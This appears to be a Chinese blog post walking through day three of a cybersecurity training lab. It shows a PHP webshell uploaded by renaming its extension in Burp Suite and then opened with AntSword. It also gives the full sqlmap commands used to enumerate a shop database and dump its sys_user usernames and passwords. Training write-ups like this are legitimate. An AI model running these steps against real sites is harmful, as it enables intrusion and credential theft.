首页 > 其他分享 >网络安全实训第三天

网络安全实训第三天

时间:2024-08-15 16:54:07浏览次数:14  
标签:网络安全 sqlmap -- 第三天 实训 注入 txt wjr user

1 文件上传漏洞

  • 准备一句话文件wjr.php.png,进入到更换头像的界面,使用BP拦截选择文件的请求

在这里插入图片描述

  • 拦截到请求后将wjr.phh.png修改为wjr.php,进行转发

在这里插入图片描述

  • 由上图可以查看到上传目录为网站目录下的upload/avator,查看是否上传成功

在这里插入图片描述


  • 使用时间戳在线工具获取到上传文件的名称

在这里插入图片描述

  • 打开中国蚁剑,将上传文件对应的URL输入,并在连接密码处输入cmd,点击添加

在这里插入图片描述


  • 双击进入后可以查看网站目录

在这里插入图片描述


2 SQL注入漏洞

2.1 第一个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 输入id=1 and 1=2进行测试,如果与之前的显示不一样则存在SQL注入漏洞

在这里插入图片描述


2.2 第二个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 使用BP拦截刷新界面的操作,获取到请求流量,并保存到wjr.txt中

在这里插入图片描述


  • 打开SQLmap工具,输入命令搜索是否存在注入点
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch

在这里插入图片描述


  • 输入命令获取所有的数据库
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch --dbs

在这里插入图片描述


  • 输入命令获取指定数据库的所有表
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 --tables

在这里插入图片描述


  • 输入命令获取注定数据库中指定表的所有字段
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user --columns

在这里插入图片描述


  • 输入命令获取指定数据库中的指定表的指定字段,这里指定的是user_name和user_password,–dump的作用是获取表中的信息
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user -C user_name,user_password --dump

在这里插入图片描述


2.3 第三个注入点

  • 第三个注入点在搜索中
    在这里插入图片描述

  • 使用BP截获搜索请求,将请求保存在wjr.txt中,并使用sqlmap进行测试

在这里插入图片描述


  • 获取到数据库信息

在这里插入图片描述


2.4 第四个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 使用BP拦截修改操作,并将流量保存到wjr.txt中

在这里插入图片描述


  • 使用SQLmap获取到数据库信息

在这里插入图片描述

标签:网络安全,sqlmap,--,第三天,实训,注入,txt,wjr,user
From: https://blog.csdn.net/weixin_44512510/article/details/141226265

相关文章

  • 百万赞同:网络安全为什么缺人_ 缺什么样的人?
    1.网络安全为什么缺人?缺人的原因是有了新的需求以前的时候,所有企业是以产品为核心的,管你有啥漏洞,管你用户信息泄露不泄露,我只要做出来的产品火爆就行。这一切随着《网络安全法》、《数据安全法》、《网络安全审查办法》等一系列有关网络安全的法律法规出台戛然而止,上到......
  • 网络安全隐患自查主要涉及以下几个方面:‌
    以下为ai回答,记录下:1、网络设备安全检查:‌包括路由器、‌交换机、‌防火墙等网络设备的默认密码更改情况、‌定期更新和升级情况、‌访问控制列表(‌ACL)‌设置、‌网络设备配置的备份以及日志记录功能。‌这些检查旨在确保网络设备的安全性,‌防止被恶意攻击1。‌2、计算机安全检查......
  • HBase学习的第三天--hbase的架构和基础命令2
    5.4 namespacehbase中没有数据库的概念,可以使用namespace来达到数据库分类别管理表的作用5.4.1 列举命名空间list_namespace5.4.2 获取命名空间描述describe_namespacedescribe_namespace'default'5.4.3 查看命名空间下的所有表list_namespace_tableslist_names......
  • 网络安全学习笔记
    Web介绍Web全称WorldWideWeb,全球广域网,也称为万维网。Web项目分为C/S架构和B/S架构。C/S架构:全称客户端服务端架构,client/server。服务端主要负责加工处理数据,客户端主要用来展示数据。有些数据存在服务端,有些数据存在客户端。B/S架构:是C/S架构的一种,浏览器/服务器架构,br......
  • 网络安全自学入门:(超详细)从入门到精通学习路线&规划,学完即可就业
    在当今高度数字化的时代,网络安全已经成为了一个至关重要的领域。随着网络威胁的不断演变和增长,对于专业网络安全人才的需求也在急剧上升。对于那些对网络安全充满热情并且渴望自学成才的人来说,制定一个系统、全面且高效的学习路线和规划是迈向成功的关键第一步。本文将为您精心......
  • 5个神级在线网络安全工具网站(非常详细)零基础入门到精通,收藏这一篇就够了
    1Haveibeenpwned一个可以查信息安全的网站,打开之后输入你的邮箱或者是电话,就可以查询是否有泄露的情况,红色代表已经账号密码已经被泄露,绿色代表是安全的。你还可以测试你的密码是否安全,在密码界面输入你想设置的密码,就可以看到这个密码被使用的次数,如果使用过多的话,建议大......
  • 云计算实训28——haproxy(七层代理)、python代码的读写分离
    一、haproxy----高可用、负载均衡1.安装安装ntpdate[root@haproxy~]#yum-yinstallntpdate.x86_64安装ntp[root@haproxy~]#yum-yinstallntp同步时间[root@haproxy~]#ntpdatecn.ntp.org.cn启动ntp服务[root@haproxy~]#systemctlstartntpd设置开机自......
  • 超详细!网络安全知识入门及学习流程
    第一章:网络安全的基本概念和术语网络安全是指保护网络系统、硬件、软件、数据以及用户的隐私和权益,防止其受到未经授权的访问、篡改、窃取或破坏。以下是一些网络安全的基本概念和术语:漏洞(Vulnerability):指系统或软件中存在的弱点或缺陷,可能被攻击者利用来获取未经授权的......
  • 网络安全人士必知的35个安全框架及模型
    一、概述网络安全专业机构制定的一套标准、准则和程序,旨在帮助组织了解和管理面临的网络安全风险。优秀的安全框架及模型应该为用户提供一种可靠方法,帮助其实现网络安全建设计划。对于那些希望按照行业最佳实践来设计或改进安全策略的组织或个人来说,网络安全框架及模型是不......
  • CCNA Security第三天.1
    ssh其实就是加密的telnet。clissh配置步骤tep1:配置主机名hostnamesshrouterstep2:配置域名ipdomiannameyeslab.comstep3:产生rsa密钥对(建议1024位长度)cryptokeygeneratersamodulus1024step4:创建本地用户名和密码(级别可选)usernameadminprivilege15pa......